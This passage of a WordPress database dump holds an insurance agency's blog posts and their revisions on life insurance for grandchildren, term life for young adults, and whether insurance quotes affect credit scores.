grandparents endured in their lifetime, many Seniors are starting to gift life insurance to their grandchildren as a financial head start. Life insurance could act as a tool for teaching your grandchildren financial responsibility.</li>\r\n 	<li><strong>Prepared for the unthinkable</strong>\r\nFinally, a benefit of getting life insurance for your grandchildren could be the primary purpose of life insurance—to prepare for the unthinkable. In the event of your grandchild’s death, a life insurance benefit could help your children during the hardest time of their lives. Parents are often financially and emotionally unprepared for the loss of a child. Your protection can help ease the burden off the parents.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Cons of Buying Life Insurance for Your Grandchildren</h3>\r\n<ul>\r\n 	<li><strong>Children don’t have an income</strong>\r\nOne of the primary functions of life insurance is to help financially support the family being left behind, especially if the insured is the breadwinner. Children don’t have to worry about this because they are dependent on their parents. Some may see life insurance as irrelevant in this case, though the coverage helps with more than supplementing income.</li>\r\n 	<li><strong>Final expenses may not be too much of a burden</strong>\r\nLife insurance also helps cover final expenses. If a family is financially prepared for children and has a healthy savings account, they could use their savings to pay for the funeral and burial expenses for the child.</li>\r\n 	<li><strong>Traditional usage may not be needed</strong>\r\nFortunately, the risk of child mortality is relatively low. Therefore, you may not need life insurance coverage for traditional reasons such as final expenses.</li>\r\n</ul>\r\nTo reiterate, life insurance is complex, and there are several factors to consider. Ultimately, purchasing life insurance for your grandchildren depends on your priorities and desires.\r\n\r\nAt the end of the day, you’ll be able to rest easy knowing your grandchildren are prepared for whatever their future holds with your help, even beyond the grave.\r\n\r\nBefore deciding anything, we encourage you to talk to a licensed insurance professional about purchasing life insurance for your grandchildren.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','Pros And Cons Of Purchasing Life Insurance For Your Grandchildren','','publish','open','open','','pros-and-cons-of-purchasing-life-insurance-for-your-grandchildren','','','2023-03-19 17:48:40','2023-03-19 17:48:40','',0,'http://cmdev-site1.com/?p=318',0,'post','',0),(319,3,'2023-03-14 13:40:05','2023-03-14 13:40:05','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nBeing a grandparent is a rewarding gift, and you likely love your grandchildren as much as your own children. You may even take the same responsibilities—to ensure their future is safe and opportunistic.\r\n\r\nWith that being said, many grandparents look into life insurance, as it can provide financial protection and a legacy for their grandchildren. However, with any insurance, there comes a lot of consideration and sorting through the options.\r\n\r\nIf you’re on the fence about purchasing life insurance for your grandchildren, we’ve listed the pros and cons to help you weigh all the benefits and disadvantages.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Pros of Buying Life Insurance for Your Grandchildren</h3>\r\n<ul>\r\n 	<li><strong>High value at a low cost</strong>\r\nThe perk of buying life insurance when your grandchild is young is the value of the policy. Because young children are normally healthy and have a long future, they’re easier to insure, and premiums are typically lower. We lose insurability as we age; therefore, you could get a decent amount of coverage for less than your grandchild would pay if he or she buys coverage at an older age, such as their early 30s.</li>\r\n 	<li><strong>Steady growth in cash value</strong>\r\nIf you decide to purchase a whole life insurance policy, they typically offer cash value which accumulates for the life of the policy. This cash value could come in handy later on in your grandchild’s life should they need to use it for college or a down payment on a home.</li>\r\n 	<li><strong>Leaving a legacy</strong>\r\nDue to the hardships this generation’s grandparents endured in their lifetime, many Seniors are starting to gift life insurance to their grandchildren as a financial head start. Life insurance could act as a tool for teaching your grandchildren financial responsibility.</li>\r\n 	<li><strong>Prepared for the unthinkable</strong>\r\nFinally, a benefit of getting life insurance for your grandchildren could be the primary purpose of life insurance—to prepare for the unthinkable. In the event of your grandchild’s death, a life insurance benefit could help your children during the hardest time of their lives. Parents are often financially and emotionally unprepared for the loss of a child. Your protection can help ease the burden off the parents.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Cons of Buying Life Insurance for Your Grandchildren</h3>\r\n<ul>\r\n 	<li><strong>Children don’t have an income</strong>\r\nOne of the primary functions of life insurance is to help financially support the family being left behind, especially if the insured is the breadwinner. Children don’t have to worry about this because they are dependent on their parents. Some may see life insurance as irrelevant in this case, though the coverage helps with more than supplementing income.</li>\r\n 	<li><strong>Final expenses may not be too much of a burden</strong>\r\nLife insurance also helps cover final expenses. If a family is financially prepared for children and has a healthy savings account, they could use their savings to pay for the funeral and burial expenses for the child.</li>\r\n 	<li><strong>Traditional usage may not be needed</strong>\r\nFortunately, the risk of child mortality is relatively low. Therefore, you may not need life insurance coverage for traditional reasons such as final expenses.</li>\r\n</ul>\r\nTo reiterate, life insurance is complex, and there are several factors to consider. Ultimately, purchasing life insurance for your grandchildren depends on your priorities and desires.\r\n\r\nAt the end of the day, you’ll be able to rest easy knowing your grandchildren are prepared for whatever their future holds with your help, even beyond the grave. Before deciding anything, we encourage you to talk to a licensed insurance professional about purchasing life insurance for your grandchildren.','Pros And Cons Of Purchasing Life Insurance For Your Grandchildren','','inherit','closed','closed','','318-revision-v1','','','2023-03-14 13:40:05','2023-03-14 13:40:05','',318,'http://cmdev-site1.com/?p=319',0,'revision','',0),(320,3,'2023-03-14 13:40:34','2023-03-14 13:40:34','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nBeing a grandparent is a rewarding gift, and you likely love your grandchildren as much as your own children. You may even take the same responsibilities—to ensure their future is safe and opportunistic.\r\n\r\nWith that being said, many grandparents look into life insurance, as it can provide financial protection and a legacy for their grandchildren. However, with any insurance, there comes a lot of consideration and sorting through the options.\r\n\r\nIf you’re on the fence about purchasing life insurance for your grandchildren, we’ve listed the pros and cons to help you weigh all the benefits and disadvantages.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Pros of Buying Life Insurance for Your Grandchildren</h3>\r\n<ul>\r\n 	<li><strong>High value at a low cost</strong>\r\nThe perk of buying life insurance when your grandchild is young is the value of the policy. Because young children are normally healthy and have a long future, they’re easier to insure, and premiums are typically lower. We lose insurability as we age; therefore, you could get a decent amount of coverage for less than your grandchild would pay if he or she buys coverage at an older age, such as their early 30s.</li>\r\n 	<li><strong>Steady growth in cash value</strong>\r\nIf you decide to purchase a whole life insurance policy, they typically offer cash value which accumulates for the life of the policy. This cash value could come in handy later on in your grandchild’s life should they need to use it for college or a down payment on a home.</li>\r\n 	<li><strong>Leaving a legacy</strong>\r\nDue to the hardships this generation’s grandparents endured in their lifetime, many Seniors are starting to gift life insurance to their grandchildren as a financial head start. Life insurance could act as a tool for teaching your grandchildren financial responsibility.</li>\r\n 	<li><strong>Prepared for the unthinkable</strong>\r\nFinally, a benefit of getting life insurance for your grandchildren could be the primary purpose of life insurance—to prepare for the unthinkable. In the event of your grandchild’s death, a life insurance benefit could help your children during the hardest time of their lives. Parents are often financially and emotionally unprepared for the loss of a child. Your protection can help ease the burden off the parents.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>Cons of Buying Life Insurance for Your Grandchildren</h3>\r\n<ul>\r\n 	<li><strong>Children don’t have an income</strong>\r\nOne of the primary functions of life insurance is to help financially support the family being left behind, especially if the insured is the breadwinner. Children don’t have to worry about this because they are dependent on their parents. Some may see life insurance as irrelevant in this case, though the coverage helps with more than supplementing income.</li>\r\n 	<li><strong>Final expenses may not be too much of a burden</strong>\r\nLife insurance also helps cover final expenses. If a family is financially prepared for children and has a healthy savings account, they could use their savings to pay for the funeral and burial expenses for the child.</li>\r\n 	<li><strong>Traditional usage may not be needed</strong>\r\nFortunately, the risk of child mortality is relatively low. Therefore, you may not need life insurance coverage for traditional reasons such as final expenses.</li>\r\n</ul>\r\nTo reiterate, life insurance is complex, and there are several factors to consider. Ultimately, purchasing life insurance for your grandchildren depends on your priorities and desires.\r\n\r\nAt the end of the day, you’ll be able to rest easy knowing your grandchildren are prepared for whatever their future holds with your help, even beyond the grave.\r\n\r\nBefore deciding anything, we encourage you to talk to a licensed insurance professional about purchasing life insurance for your grandchildren.','Pros And Cons Of Purchasing Life Insurance For Your Grandchildren','','inherit','closed','closed','','318-revision-v1','','','2023-03-14 13:40:34','2023-03-14 13:40:34','',318,'http://cmdev-site1.com/?p=320',0,'revision','',0),(321,3,'2023-03-14 13:46:29','2023-03-14 13:46:29','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWhen you are a young adult, you may think your career is the main path to financial security. With financial needs evolving over time, one way young adults may be able to secure their financial future is through life insurance.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are permanent and term life insurance?</h3>\r\nLife insurance is a financial tool that may help protect your family in the event of your passing. Two primary types of life insurance are permanent and term.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Permanent life insurance stays with you as you grow.</h3>\r\nPermanent life insurance, sometimes known as whole life, offers lifetime coverage and can include added benefits and features that may become part of your financial plan, such as a cash value feature.\r\n\r\nPermanent life insurance policies may become more expensive as you age. Permanent life insurance may also be too costly for young adults just starting out in their careers but might be an option for those who want to build cash value in their life insurance product.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Term life insurance covers you for a predetermined term.</h3>\r\nTerm life insurance is purchased for a specific time limit or pre-defined term, such as a certain number of years.<sup>1</sup> The policy pays money to named beneficiaries, the person named to receive the death benefit in the policy, if the insured dies during the coverage term.\r\n\r\nTerm life insurance may be more affordable when you are younger. This type of insurance is intended to provide lower-cost coverage for a specified time period.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>The benefits of life insurance for young adults.</h3>\r\nYoung adults who choose to purchase life insurance can experience some of these benefits:\r\n<ul>\r\n 	<li>replacement of lost income if the primary earner were to pass away</li>\r\n 	<li>payment toward outstanding debts</li>\r\n 	<li>coverage for funeral and other final expense costs</li>\r\n 	<li>care for a loved one or family members</li>\r\n 	<li>the ability to leave money to a favorite charity</li>\r\n</ul>\r\nWe now know a little bit more about permanent and term life insurance and ways they may be able to help you and your family. Let’s discuss term life insurance and explore some things to consider before purchasing.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>When should young adults consider buying term life insurance?</h3>\r\nThe decision to purchase term life insurance involves several lifestyle factors.\r\n<ul>\r\n 	<li><strong>Age:</strong> Term life insurance offers flexibility and can vary from 10, 15, 25, or more years, allowing you to select the length of your policy based on your current circumstances and make adjustments later.</li>\r\n 	<li><strong>Health:</strong> Current and past health conditions, as well as factors including age, gender, and weight, may influence the cost and your ability to get a life insurance policy.</li>\r\n 	<li><strong>Marital status:</strong> If you are single, you may need less insurance. If you are married, you may need to consider the income needs of your partner as well as any joint debt or financial investments.</li>\r\n 	<li><strong>Family status:</strong> If you have children, you may have considerations such as college funds, school tuition (for private school), and child care.</li>\r\n 	<li><strong>Financial plan:</strong> If you choose to include life insurance as part of your financial plan and long-term goals, you may want to use insurance products to help cover debts, provide additional income, and use them for future goals.</li>\r\n</ul>\r\nThis list of considerations is not exhaustive. You know your personal/financial needs best. Speaking with a licensed insurance professional can also help clarify your future needs.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Term life insurance may be advantageous for young adults.</h3>\r\nOnce you own assets and have others who count on you, you may want to consider purchasing term life insurance. Term life insurance can be an important part of helping protect your family and assets and can be part of your future financial planning strategy.\r\n\r\nPurchasing term life insurance may bring you ease and protection, knowing you have helped prepare for the future and the unexpected.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. National Association of Insurance Commissioners, Term Life Insurance, 2020, <a href=\"https://content.naic.org/cipr_topics/topic_life_insurance.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://content.naic.org/cipr_topics/topic_life_insurance.htm</a></span></em>\r\n<div id=\"malwarebytes-root\"></div>','Term Life Insurance For Young Adults: When Is The Right Time To Buy?','','publish','open','open','','term-life-insurance-for-young-adults-when-is-the-right-time-to-buy','','','2023-03-19 17:49:14','2023-03-19 17:49:14','',0,'http://cmdev-site1.com/?p=321',0,'post','',0),(322,3,'2023-03-14 13:46:01','2023-03-14 13:46:01','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWhen you are a young adult, you may think your career is the main path to financial security. With financial needs evolving over time, one way young adults may be able to secure their financial future is through life insurance.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are permanent and term life insurance?</h3>\r\nLife insurance is a financial tool that may help protect your family in the event of your passing. Two primary types of life insurance are permanent and term.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Permanent life insurance stays with you as you grow.</h3>\r\nPermanent life insurance, sometimes known as whole life, offers lifetime coverage and can include added benefits and features that may become part of your financial plan, such as a cash value feature.\r\n\r\nPermanent life insurance policies may become more expensive as you age. Permanent life insurance may also be too costly for young adults just starting out in their careers but might be an option for those who want to build cash value in their life insurance product.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Term life insurance covers you for a predetermined term.</h3>\r\nTerm life insurance is purchased for a specific time limit or pre-defined term, such as a certain number of years.<sup>1</sup> The policy pays money to named beneficiaries, the person named to receive the death benefit in the policy, if the insured dies during the coverage term.\r\n\r\nTerm life insurance may be more affordable when you are younger. This type of insurance is intended to provide lower-cost coverage for a specified time period.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>The benefits of life insurance for young adults.</h3>\r\nYoung adults who choose to purchase life insurance can experience some of these benefits:\r\n<ul>\r\n 	<li>replacement of lost income if the primary earner were to pass away</li>\r\n 	<li>payment toward outstanding debts</li>\r\n 	<li>coverage for funeral and other final expense costs</li>\r\n 	<li>care for a loved one or family members</li>\r\n 	<li>the ability to leave money to a favorite charity</li>\r\n</ul>\r\nWe now know a little bit more about permanent and term life insurance and ways they may be able to help you and your family. Let’s discuss term life insurance and explore some things to consider before purchasing.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>When should young adults consider buying term life insurance?</h3>\r\nThe decision to purchase term life insurance involves several lifestyle factors.\r\n<ul>\r\n 	<li><strong>Age:</strong> Term life insurance offers flexibility and can vary from 10, 15, 25, or more years, allowing you to select the length of your policy based on your current circumstances and make adjustments later.</li>\r\n 	<li><strong>Health:</strong> Current and past health conditions, as well as factors including age, gender, and weight, may influence the cost and your ability to get a life insurance policy.</li>\r\n 	<li><strong>Marital status:</strong> If you are single, you may need less insurance. If you are married, you may need to consider the income needs of your partner as well as any joint debt or financial investments.</li>\r\n 	<li><strong>Family status:</strong> If you have children, you may have considerations such as college funds, school tuition (for private school), and child care.</li>\r\n 	<li><strong>Financial plan:</strong> If you choose to include life insurance as part of your financial plan and long-term goals, you may want to use insurance products to help cover debts, provide additional income, and use them for future goals.</li>\r\n</ul>\r\nThis list of considerations is not exhaustive. You know your personal/financial needs best. Speaking with a licensed insurance professional can also help clarify your future needs.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Term life insurance may be advantageous for young adults.</h3>\r\nOnce you own assets and have others who count on you, you may want to consider purchasing term life insurance. Term life insurance can be an important part of helping protect your family and assets and can be part of your future financial planning strategy.\r\n\r\nPurchasing term life insurance may bring you ease and protection, knowing you have helped prepare for the future and the unexpected.\r\n\r\nIt’s important to do your research and shop around. To find coverage that matches your needs, do your research and contact a licensed insurance professional for guidance.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. National Association of Insurance Commissioners, Term Life Insurance, 2020, <a href=\"https://content.naic.org/cipr_topics/topic_life_insurance.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://content.naic.org/cipr_topics/topic_life_insurance.htm</a></span></em>\r\n<div id=\"malwarebytes-root\"></div>','Term Life Insurance For Young Adults: When Is The Right Time To Buy?','','inherit','closed','closed','','321-revision-v1','','','2023-03-14 13:46:01','2023-03-14 13:46:01','',321,'http://cmdev-site1.com/?p=322',0,'revision','',0),(410,3,'2023-03-19 17:49:14','2023-03-19 17:49:14','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWhen you are a young adult, you may think your career is the main path to financial security. With financial needs evolving over time, one way young adults may be able to secure their financial future is through life insurance.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are permanent and term life insurance?</h3>\r\nLife insurance is a financial tool that may help protect your family in the event of your passing. Two primary types of life insurance are permanent and term.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Permanent life insurance stays with you as you grow.</h3>\r\nPermanent life insurance, sometimes known as whole life, offers lifetime coverage and can include added benefits and features that may become part of your financial plan, such as a cash value feature.\r\n\r\nPermanent life insurance policies may become more expensive as you age. Permanent life insurance may also be too costly for young adults just starting out in their careers but might be an option for those who want to build cash value in their life insurance product.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Term life insurance covers you for a predetermined term.</h3>\r\nTerm life insurance is purchased for a specific time limit or pre-defined term, such as a certain number of years.<sup>1</sup> The policy pays money to named beneficiaries, the person named to receive the death benefit in the policy, if the insured dies during the coverage term.\r\n\r\nTerm life insurance may be more affordable when you are younger. This type of insurance is intended to provide lower-cost coverage for a specified time period.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>The benefits of life insurance for young adults.</h3>\r\nYoung adults who choose to purchase life insurance can experience some of these benefits:\r\n<ul>\r\n 	<li>replacement of lost income if the primary earner were to pass away</li>\r\n 	<li>payment toward outstanding debts</li>\r\n 	<li>coverage for funeral and other final expense costs</li>\r\n 	<li>care for a loved one or family members</li>\r\n 	<li>the ability to leave money to a favorite charity</li>\r\n</ul>\r\nWe now know a little bit more about permanent and term life insurance and ways they may be able to help you and your family. Let’s discuss term life insurance and explore some things to consider before purchasing.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>When should young adults consider buying term life insurance?</h3>\r\nThe decision to purchase term life insurance involves several lifestyle factors.\r\n<ul>\r\n 	<li><strong>Age:</strong> Term life insurance offers flexibility and can vary from 10, 15, 25, or more years, allowing you to select the length of your policy based on your current circumstances and make adjustments later.</li>\r\n 	<li><strong>Health:</strong> Current and past health conditions, as well as factors including age, gender, and weight, may influence the cost and your ability to get a life insurance policy.</li>\r\n 	<li><strong>Marital status:</strong> If you are single, you may need less insurance. If you are married, you may need to consider the income needs of your partner as well as any joint debt or financial investments.</li>\r\n 	<li><strong>Family status:</strong> If you have children, you may have considerations such as college funds, school tuition (for private school), and child care.</li>\r\n 	<li><strong>Financial plan:</strong> If you choose to include life insurance as part of your financial plan and long-term goals, you may want to use insurance products to help cover debts, provide additional income, and use them for future goals.</li>\r\n</ul>\r\nThis list of considerations is not exhaustive. You know your personal/financial needs best. Speaking with a licensed insurance professional can also help clarify your future needs.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Term life insurance may be advantageous for young adults.</h3>\r\nOnce you own assets and have others who count on you, you may want to consider purchasing term life insurance. Term life insurance can be an important part of helping protect your family and assets and can be part of your future financial planning strategy.\r\n\r\nPurchasing term life insurance may bring you ease and protection, knowing you have helped prepare for the future and the unexpected.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. National Association of Insurance Commissioners, Term Life Insurance, 2020, <a href=\"https://content.naic.org/cipr_topics/topic_life_insurance.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://content.naic.org/cipr_topics/topic_life_insurance.htm</a></span></em>\r\n<div id=\"malwarebytes-root\"></div>','Term Life Insurance For Young Adults: When Is The Right Time To Buy?','','inherit','closed','closed','','321-revision-v1','','','2023-03-19 17:49:14','2023-03-19 17:49:14','',321,'http://cmdev-site1.com/?p=410',0,'revision','',0),(324,3,'2023-03-14 13:50:47','2023-03-14 13:50:47','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nIf you want to buy life insurance, you probably already know you’re making a decision to help protect your loved ones in the event of your passing.\r\n\r\nAs you research the type and amount of life insurance that’s right for you, you may be wondering, can getting a life insurance quote affect my credit score?\r\n\r\nIn short, the answer is no. But there might be some more info you should know.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Insurer May Check Your Credit</h3>\r\nWhen you’re in the market for a life insurance policy, the insurer may look at your credit. It’s important to note most insurance companies do not use your credit score. But they might look at events on your credit report like bankruptcy.<sup>1</sup>\r\n\r\nInsurance companies may also look at your LexisNexis risk score, which lifeant.com describes as “a composite score that looks at your credit score, driving record, and more and creates an overall rating of how risky you are to insurance companies.”<sup>1</sup> The attributes used vary significantly by company.\r\n\r\nWhen a life insurance carrier checks this data, it is an inquiry known as a soft inquiry rather than a hard inquiry.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is a Soft Inquiry?</h3>\r\nA soft inquiry is when your credit report is checked, but your credit score is not impacted because the inquiry is not related to a specific application for credit.<sup>2</sup>\r\n\r\nA soft inquiry may happen when you check your own credit, a company checks your credit to determine if you’re qualified for preapproval offers, or a current creditor checks your credit, to name a few examples.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Life Insurance Companies Make Soft Inquiries</h3>\r\nA life insurance company checking your credit is also considered a soft inquiry. Therefore, it does not affect your credit score.<sup>2</sup> So when you’re in the process of researching or buying life insurance, the impact on your credit score (or lack thereof) isn’t something to agonize over.\r\n\r\nIt’s worth noting your credit history may have an impact on your life insurance rates.<sup>1</sup> Again, the credit data life insurers access varies by company, and each state views this information differently.\\\r\n\r\nAlso, your credit history is just one of many factors that your insurer will consider when determining your life insurance premium rates.\r\n\r\nState insurance regulators are beginning to monitor the impact of credit-based information on consumers.<sup>3</sup>\r\n\r\nIf you have any questions about your credit, contact a financial advisor. For more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Life Ant, Do You Need Good Credit to Buy Life Insurance?, 2020, <a href=\"https://www.lifeant.com/faq/do-you-need-good-credit-to-buy-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.lifeant.com/faq/do-you-need-good-credit-to-buy-life-insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Experian, What is a Soft Inquiry?, 2019, <a href=\"https://www.experian.com/blogs/ask-experian/what-is-a-soft-inquiry/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.experian.com/blogs/ask-experian/what-is-a-soft-inquiry/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. NAIC, Credit-Based Insurance Scores, 2021, <a href=\"https://content.naic.org/cipr_topics/topic_creditbased_insurance_scores.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://content.naic.org/cipr_topics/topic_creditbased_insurance_scores.htm</a></span></em>','Can Getting A Life Insurance Quote Affect My Credit Score?','','publish','open','open','','can-getting-a-life-insurance-quote-affect-my-credit-score','','','2023-03-19 17:49:43','2023-03-19 17:49:43','',0,'http://cmdev-site1.com/?p=324',0,'post','',0),(325,3,'2023-03-14 13:50:05','2023-03-14 13:50:05','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nIf you want to buy life insurance, you probably already know you’re making a decision to help protect your loved ones in the event of your passing.\r\n\r\nAs you research the type and amount of life insurance that’s right for you, you may be wondering, can getting a life insurance quote affect my credit score?\r\n\r\nIn short, the answer is no. But there might be some more info you should know.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Insurer May Check Your Credit</h3>\r\nWhen you’re in the market for a life insurance policy, the insurer may look at your credit. It’s important to note most insurance companies do not use your credit score. But they might look at events on your credit report like bankruptcy.<sup>1</sup>\r\n\r\nInsurance companies may also look at your LexisNexis risk score, which lifeant.com describes as “a composite score that looks at your credit score, driving record, and more and creates an overall rating of how risky you are to insurance companies.”<sup>1</sup> The attributes used vary significantly by company.\r\n\r\nWhen a life insurance carrier checks this data, it is an inquiry known as a soft inquiry rather than a hard inquiry.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is a Soft Inquiry?</h3>\r\nA soft inquiry is when your credit report is checked, but your credit score is not impacted because the inquiry is not related to a specific application for credit.<sup>2</sup> A soft inquiry may happen when you check your own credit, a company checks your credit to determine if you’re qualified for preapproval offers, or a current creditor checks your credit, to name a few examples.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Life Insurance Companies Make Soft Inquiries</h3>\r\nA life insurance company checking your credit is also considered a soft inquiry. Therefore, it does not affect your credit score.<sup>2</sup> So when you’re in the process of researching or buying life insurance, the impact on your credit score (or lack thereof) isn’t something to agonize over.\r\n\r\nIt’s worth noting your credit history may have an impact on your life insurance rates.<sup>1</sup> Again, the credit data life insurers access varies by company, and each state views this information differently. Also, your credit history is just one of many factors that your insurer will consider when determining your life insurance premium rates.\r\n\r\nState insurance regulators are beginning to monitor the impact of credit-based information on consumers.<sup>3</sup>\r\n\r\nIf you have any questions about your credit, contact a financial advisor. If you have any questions about the life insurance application process, contact a licensed insurance agent.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Life Ant, Do You Need Good Credit to Buy Life Insurance?, 2020, <a href=\"https://www.lifeant.com/faq/do-you-need-good-credit-to-buy-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.lifeant.com/faq/do-you-need-good-credit-to-buy-life-insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Experian, What is a Soft Inquiry?, 2019, <a href=\"https://www.experian.com/blogs/ask-experian/what-is-a-soft-inquiry/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.experian.com/blogs/ask-experian/what-is-a-soft-inquiry/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. NAIC, Credit-Based Insurance Scores, 2021, <a href=\"https://content.naic.org/cipr_topics/topic_creditbased_insurance_scores.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://content.naic.org/cipr_topics/topic_creditbased_insurance_scores.htm</a></span></em>','Can Getting A Life Insurance Quote Affect My Credit Score?','','inherit','closed','closed','','324-revision-v1','','','2023-03-14 13:50:05','2023-03-14 13:50:05','',324,'http://cmdev-site1.com/?p=325',0,'revision','',0),(326,3,'2023-03-14 13:50:32','2023-03-14 13:50:32','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nIf you want to buy life insurance, you probably already know you’re making a decision to help protect your loved ones in the event of your passing.\r\n\r\nAs you research the type and amount of life insurance that’s right for you, you may be wondering, can getting a life insurance quote affect my credit score?\r\n\r\nIn short, the answer is no. But there might be some more info you should know.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Insurer May Check Your Credit</h3>\r\nWhen you’re in the market for a life insurance policy, the insurer may look at your credit. It’s important to note most insurance companies do not use your credit score. But they might look at events on your credit report like bankruptcy.<sup>1</sup>\r\n\r\nInsurance companies may also look at your LexisNexis risk score, which lifeant.com describes as “a composite score that looks at your credit score, driving record, and more and creates an overall rating of how risky you are to insurance companies.”<sup>1</sup> The attributes used vary significantly by company.\r\n\r\nWhen a life insurance carrier checks this data, it is an inquiry known as a soft inquiry rather than a hard inquiry.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What is a Soft Inquiry?</h3>\r\nA soft inquiry is when your credit report is checked, but your credit score is not impacted because the inquiry is not related to a specific application for credit.<sup>2</sup>\r\n\r\nA soft inquiry may happen when you check your own credit, a company checks your credit to determine if you’re qualified for preapproval offers, or a current creditor checks your credit, to name a few examples.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Life Insurance Companies Make Soft Inquiries</h3>\r\nA life insurance company checking your credit is also considered a soft inquiry. Therefore, it does not affect your credit score.<sup>2</sup> So when you’re in the process of researching or buying life insurance, the impact on your credit score (or lack thereof) isn’t something to agonize over.\r\n\r\nIt’s worth noting your credit history may have an impact on your life insurance rates.<sup>1</sup> Again, the credit data life insurers access varies by company, and each state views this information differently.\\\r\n\r\nAlso, your credit history is just one of many factors that your insurer will consider when determining your life insurance premium rates.\r\n\r\nState insurance regulators are beginning to monitor the impact of credit-based information on consumers.<sup>3</sup>\r\n\r\nIf you have any questions about your credit, contact a financial advisor. If you have any questions about the life insurance application process, contact a licensed insurance agent.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Life Ant, Do You Need Good Credit to Buy Life Insurance?, 2020, <a href=\"https://www.lifeant.com/faq/do-you-need-good-credit-to-buy-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.lifeant.com/faq/do-you-need-good-credit-to-buy-life-insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Experian, What is a Soft Inquiry?, 2019, <a href=\"https://www.experian.com/blogs/ask-experian/what-is-a-soft-inquiry/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.experian.com/blogs/ask-experian/what-is-a-soft-inquiry/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. NAIC, Credit-Based Insurance Scores, 2021, <a href=\"https://content.naic.org/cipr_topics/topic_creditbased_insurance_scores.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://content.naic.org/cipr_topics/topic_creditbased_insurance_scores.htm</a></span></em>','Can Getting A Life Insurance 